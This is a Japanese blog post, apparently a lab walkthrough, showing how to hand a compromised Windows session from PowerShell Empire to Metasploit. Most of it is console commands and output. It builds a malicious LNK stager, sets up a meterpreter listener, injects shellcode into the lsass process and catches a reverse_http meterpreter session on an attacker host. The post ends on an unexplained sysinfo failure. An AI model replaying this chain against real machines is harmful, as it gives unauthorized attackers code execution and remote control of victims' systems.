EMPIRE 2 metasploit

EMPIREで侵入後、セッションを張ったPCからserverに侵入したい。
実際はキーロガー等、地道にやっていくんだろうけど、DEMOの場合、脆弱性突いてすぐに侵入する方がかっこ良い。

問題は、侵入したwindowsPCでtoolが使えるかどうか。
使用できるtoolの幅を広げるために、EMPIREからmetasploitへバトンを渡せるようにする検証をやってみた。

はまりポイントはmetasploitのバージョンだった。
4.16.13だと、セッション渡したとたんに死ぬ現象が発生。4.16.26にverupすると解消された。
ちなみにEMPIREのバージョンは2.3。

まずは、いつも通りEMPIREとセッションを張る

(Empire: listeners) > (Empire: stager/windows/launcher_lnk) > execute

[*] Stager output written out to: clickme.lnk

(Empire: stager/windows/launcher_lnk) > [+] Initial agent 4SVP6M9W from 10.0.2.5 now active (Slack)

(Empire: stager/windows/launcher_lnk) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  4SVP6M9W        ps    10.0.2.5        OSAKANA         *osakana/n-lab     powershell/2800     5/0.0    2018-01-20 11:47:28

(Empire: agents) > rename 4SVP6M9W WIN7
(Empire: agents) > interact WIN7
(Empire: WIN7) > back

次に、もうひとつlistenerを作成する。名前は”change-metasp”にしてみる。

ここでlistenerをmetasploitモードにて設定することで、meterpreterへトスできる

(Empire: listeners) > uselistener meterpreter
(Empire: listeners/meterpreter) > set Name change-metasp
(Empire: listeners/meterpreter) > set Port 8000
(Empire: listeners/meterpreter) > info

    Name: Meterpreter
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a 'foreign' http[s] Meterpreter listener.

Meterpreter Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  Host              True        http://10.0.2.15:8000            Hostname/IP for staging.
  Name              True        change-metasp                    Name for the listener.
  Port              True        8000                             Port for the listener.


(Empire: listeners/meterpreter) > execute
[*] Starting listener 'change-metasp'
[+] Listener successfully started!

次は、meterpreterのインジェクション先を指定する

(Empire: listeners/http) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  A21TR6ZE        ps    10.0.2.5        OSAKANA        *osakana\n-lab       powershell/1068     5/0.0    2018-01-19 21:46:08

(Empire: agents) > interact A21TR6ZE
(Empire: A21TR6ZE) > getpid
(Empire: A21TR6ZE) > 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName          
-------  ------    -----      -----     ------     --  -- -----------          
    379      32    59524      69324       4.02   1068   1 powershell

(Empire: A21TR6ZE) > ps
(Empire: A21TR6ZE) > 
ProcessName  PID Arch UserName                     MemUsage
-----------  --- ---- --------                     --------
Idle           0 x64  N/A                          0.02 MB 
System         4 x64  N/A                          0.74 MB 
smss         256 x64  NT AUTHORITY\SYSTEM          1.05 MB 
svchost      276 x64  NT AUTHORITY\LOCAL SERVICE   14.74 MB
csrss        332 x64  NT AUTHORITY\SYSTEM          5.45 MB 
csrss        368 x64  NT AUTHORITY\SYSTEM          12.19 MB
wininit      376 x64  NT AUTHORITY\SYSTEM          5.49 MB 
winlogon     404 x64  NT AUTHORITY\SYSTEM          7.71 MB 
services     464 x64  NT AUTHORITY\SYSTEM          8.77 MB 
lsass        472 x64  NT AUTHORITY\SYSTEM          10.38 MB
svchost      476 x64  NT AUTHORITY\NETWORK SERVICE 15.84 MB
powershell  1068 x64  osakana\n-lab                71.18 MB


(Empire: A21TR6ZE) > injectshellcode change-metasp 472
(Empire: powershell/code_execution/invoke_shellcode) > 

“change-metasp”がプロセス472にインジェクションするよーという設定info

(Empire: powershell/code_execution/invoke_shellcode) > info

              Name: Invoke-Shellcode
            Module: powershell/code_execution/invoke_shellcode
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None

Authors:
  @mattifestation

Description:
  Uses PowerSploit's Invoke--Shellcode to inject shellcode
  into the process ID of your choosing or within the context
  of the running PowerShell process. If you're injecting
  custom shellcode, make sure it's in the correct format and
  matches the architecture of the process you're injecting
  into.

Comments:
  http://www.exploit-monday.com https://github.com/mattifestat
  ion/PowerSploit/blob/master/CodeExecution/Invoke-
  Shellcode.ps1

Options:

  Name      Required    Value                     Description
  ----      --------    -------                   -----------
  ProcessID False       472                       Process ID of the process you want to   
                                                  inject shellcode into.                  
  Lhost     False                                 Local host handler for the meterpreter  
                                                  shell.                                  
  Agent     True        WIN7                      Agent to run module on.                 
  Listener  False       change-metasp             Meterpreter/Beacon listener name.       
  Lport     False                                 Local port of the host handler.         
  Shellcode False                                 Custom shellcode to inject,             
                                                  0xaa,0xab,... format.                   
  Payload   False       reverse_https             Metasploit payload to inject            
                                                  (reverse_http[s]).                      

(Empire: powershell/code_execution/invoke_shellcode) > set Payload reverse_http

ペイロードだけ、reverse_httpにしておく。同じマシンでmetasploitを立ち上げておくのでLhostは空にしておく。

 

次にmetasploitの設定。

msf > use exploit/multi/handler
msf exploit(handler) > set paylad windows/meterpreter/reverse_http
paylad => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(handler) > set LPORT 8000
LPORT => 8000
msf exploit(handler) > setg exitonsession false
exitonsession => false
msf exploit(handler) > set

Global
======

  Name           Value
  ----           -----
  exitonsession  false

Module: multi/handler
=====================

  Name                    Value
  ----                    -----
  ContextInformationFile  
  DisablePayloadHandler   false
  EnableContextEncoding   false
  ExitOnSession           false
  LHOST                   10.0.2.15
  LPORT                   8000
  ListenerTimeout         0
  VERBOSE                 false
  WORKSPACE               
  paylad                  windows/meterpreter/reverse_http

msf exploit(handler) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.2.15:8000

EMPIREに戻り、実行する

(Empire: powershell/code_execution/invoke_shellcode) > execute 
Job started: 9C81LK

すると、metasploitとセッションが張られる

msf exploit(multi/handler) > [*] http://10.0.2.15:8000 handling request from 10.0.2.5; (UUID: 67ehyyi0) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (10.0.2.15:8000 -> 10.0.2.5:49375) at 2018-01-20 13:49:34 +0900
sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/windows               10.0.2.15:8000 -> 10.0.2.5:49375 (10.0.2.5)

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo

しかしだ、sysinfoなんてしらねーと怒られる。。なぜ・・